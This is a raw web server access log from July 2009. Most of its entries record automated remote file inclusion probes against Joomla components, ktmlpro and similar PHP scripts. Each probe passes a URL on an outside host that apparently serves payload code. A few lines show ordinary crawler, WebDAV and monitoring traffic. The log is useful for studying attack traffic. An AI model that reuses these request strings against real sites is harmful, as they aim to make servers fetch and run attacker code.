114.200.199.144 - - [01/Jul/2009:06:21:30 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:21:43 -0400] "GET /logs/access_log.Q109060200%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:21:47 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
172.16.1.180 - - [01/Jul/2009:06:21:48 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:06:21:48 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:06:21:57 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
114.200.199.144 - - [01/Jul/2009:06:21:59 -0400] "GET /logs/access_log.Q109060200%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:22:39 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:22:39 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:22:39 -0400] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:22:42 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:22:42 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:22:42 -0400] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.122.79.200 - - [01/Jul/2009:06:23:04 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.122.79.200 - - [01/Jul/2009:06:23:04 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.122.79.200 - - [01/Jul/2009:06:23:04 -0400] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:23:17 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:23:18 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:23:21 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:23:22 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:23:23 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
172.16.1.180 - - [01/Jul/2009:06:23:42 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:06:23:42 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:06:23:42 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
222.122.79.200 - - [01/Jul/2009:06:23:48 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:25:06 -0400] "GET /logs/access_log.Q109060200%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:25:13 -0400] "GET /logs/access_log.Q109060200%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:25:15 -0400] "GET /logs/access_log.Q109060200%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
172.16.1.180 - - [01/Jul/2009:06:25:39 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:06:25:39 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [01/Jul/2009:06:25:39 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
114.200.199.144 - - [01/Jul/2009:06:25:41 -0400] "GET /logs/access_log.Q109060300%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:25:41 -0400] "GET /logs/access_log.Q109060300%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:25:45 -0400] "GET /logs/access_log.Q109050900%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:25:48 -0400] "GET /logs/access_log.Q109050900%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:06:26:55 -0400] "GET /errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:06:27:06 -0400] "GET /logs/errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:06:27:06 -0400] "GET /logs/access_log.Q109050800/errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [01/Jul/2009:06:27:53 -0400] "GET /components/com_virtuemart/errors.php?error=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
220.231.126.252 - - [01/Jul/2009:06:27:53 -0400] "GET /logs/components/com_virtuemart/errors.php?error=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
220.231.126.252 - - [01/Jul/2009:06:27:53 -0400] "GET /logs/access_log.Q109052900/components/com_virtuemart/errors.php?error=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
12.11.10.200 - - [01/Jul/2009:06:28:14 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
222.122.79.200 - - [01/Jul/2009:06:29:16 -0400] "GET /logs/access_log.Q109060300%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
202.181.243.113 - - [01/Jul/2009:06:30:12 -0400] "GET /errors.php?error=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
202.181.243.113 - - [01/Jul/2009:06:30:12 -0400] "GET /logs/access_log.Q109050800/errors.php?error=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.181.243.113 - - [01/Jul/2009:06:30:17 -0400] "GET /logs/errors.php?error=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:30:53 -0400] "GET /logs/access_log.Q109051600//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:30:53 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:30:53 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:30:53 -0400] "GET /logs/access_log.Q109051600//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:30:53 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:30:54 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:30:59 -0400] "GET /logs/access_log.Q109061900//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:31:02 -0400] "GET /logs/access_log.Q109060200/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:31:03 -0400] "GET /logs/access_log.Q109061900//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.122.79.200 - - [01/Jul/2009:06:32:12 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
222.122.79.200 - - [01/Jul/2009:06:32:12 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.122.79.200 - - [01/Jul/2009:06:32:12 -0400] "GET /logs/access_log.Q109051600//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.122.79.200 - - [01/Jul/2009:06:32:17 -0400] "GET /logs/access_log.Q109061900//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
202.181.243.113 - - [01/Jul/2009:06:32:27 -0400] "GET /logs/errors.php?error=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
202.181.243.113 - - [01/Jul/2009:06:32:30 -0400] "GET /errors.php?error=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
202.181.243.113 - - [01/Jul/2009:06:32:32 -0400] "GET /logs/access_log.Q109050800/errors.php?error=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.232.105.116 - - [01/Jul/2009:06:34:54 -0400] "GET /logs/access_log.Q109060200/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
66.249.71.16 - - [01/Jul/2009:06:35:36 -0400] "GET /images/items/9200003_full.jpg HTTP/1.1" 200 3160 "-" "Googlebot-Image/1.0"
222.73.17.7 - - [01/Jul/2009:06:35:43 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 7723 "-" "libwww-perl/5.79"
222.73.17.7 - - [01/Jul/2009:06:35:44 -0400] "GET /logs/access_log.Q109060800////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
209.59.12.99 - - [01/Jul/2009:06:35:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.73.17.7 - - [01/Jul/2009:06:35:47 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 454 "-" "libwww-perl/5.79"
222.73.17.7 - - [01/Jul/2009:06:36:16 -0400] "GET /logs/access_log.Q109060800////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
222.73.17.7 - - [01/Jul/2009:06:36:16 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 7723 "-" "libwww-perl/5.79"
222.73.17.7 - - [01/Jul/2009:06:36:22 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 454 "-" "libwww-perl/5.79"
114.200.199.144 - - [01/Jul/2009:06:36:38 -0400] "GET /logs/access_log.Q109061900%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:36:39 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Jul/2009:06:36:40 -0400] "GET /logs/access_log.Q109060900////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
114.200.199.144 - - [01/Jul/2009:06:36:47 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
114.200.199.144 - - [01/Jul/2009:06:36:47 -0400] "GET /logs/access_log.Q109061900%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Jul/2009:06:37:10 -0400] "GET /logs/access_log.Q109060900////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
195.207.160.102 - - [01/Jul/2009:06:38:07 -0400] "GET /logs/error_log.Q109060800%20%20/errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:06:38:52 -0400] "GET /logs/error_log.Q109050800%20%20/errors.php?error=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.137.160.12 - - [01/Jul/2009:06:39:00 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.137.160.12 - - [01/Jul/2009:06:39:00 -0400] "GET /logs/access_log.Q109060300//components/com_smf/smf.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
195.137.160.12 - - [01/Jul/2009:06:39:05 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
62.77.32.217 - - [01/Jul/2009:06:39:27 -0400] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
62.77.32.217 - - [01/Jul/2009:06:39:27 -0400] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
62.77.32.217 - - [01/Jul/2009:06:39:28 -0400] "GET /logs/access_log.Q109061200//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
62.77.32.217 - - [01/Jul/2009:06:39:30 -0400] "GET /logs/access_log.Q109061200//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
62.77.32.217 - - [01/Jul/2009:06:39:30 -0400] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
62.77.32.217 - - [01/Jul/2009:06:39:30 -0400] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
195.137.160.12 - - [01/Jul/2009:06:40:22 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
222.122.79.200 - - [01/Jul/2009:06:40:35 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.122.79.200 - - [01/Jul/2009:06:40:36 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.122.79.200 - - [01/Jul/2009:06:40:36 -0400] "GET /logs/access_log.Q109060300//components/com_smf/smf.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
195.137.160.12 - - [01/Jul/2009:06:40:38 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Jul/2009:06:40:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.77.32.217 - - [01/Jul/2009:06:42:21 -0400] "GET /logs/access_log.Q109052200//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
62.77.32.217 - - [01/Jul/2009:06:42:44 -0400] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
62.77.32.217 - - [01/Jul/2009:06:42:45 -0400] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
62.77.32.217 - - [01/Jul/2009:06:42:45 -0400] "GET /logs/access_log.Q109061200//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
202.181.243.113 - - [01/Jul/2009:06:43:28 -0400] "GET /errors.php?error=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
202.181.243.113 - - [01/Jul/2009:06:43:28 -0400] "GET /logs/access_log.Q109050800%20%20/errors.php?error=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
202.181.243.113 - - [01/Jul/2009:06:43:28 -0400] "GET /logs/errors.php?error=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.82.228.83 - - [01/Jul/2009:06:43:44 -0400] "GET /logs/access_log.Q109061200//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.82.228.83 - - [01/Jul/2009:06:43:44 -0400] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.82.228.83 - - [01/Jul/2009:06:43:44 -0400] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.82.228.83 - - [01/Jul/2009:06:43:46 -0400] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.82.228.83 - - [01/Jul/2009:06:43:46 -0400] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.82.228.83 - - [01/Jul/2009:06:43:46 -0400] "GET /logs/access_log.Q109061200//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
66.172.22.2 - - [01/Jul/2009:06:44:30 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.172.22.2 - - [01/Jul/2009:06:44:30 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.172.22.2 - - [01/Jul/2009:06:44:33 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.172.22.2 - - [01/Jul/2009:06:44:34 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
209.59.12.99 - - [01/Jul/2009:06:45:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.172.22.2 - - [01/Jul/2009:06:45:49 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:06:45:49 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:06:46:04 -0400] "GET /logs/access_log.Q109061800//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.172.22.2 - - [01/Jul/2009:06:46:05 -0400] "GET /logs/access_log.Q109061800//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
62.77.32.217 - - [01/Jul/2009:06:46:44 -0400] "GET /logs/access_log.Q109052200//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
66.172.22.2 - - [01/Jul/2009:06:46:50 -0400] "GET /logs/access_log.Q109061800//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:06:46:51 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:06:46:51 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:06:46:51 -0400] "GET /logs/access_log.Q109061800//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:06:46:51 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:06:46:52 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
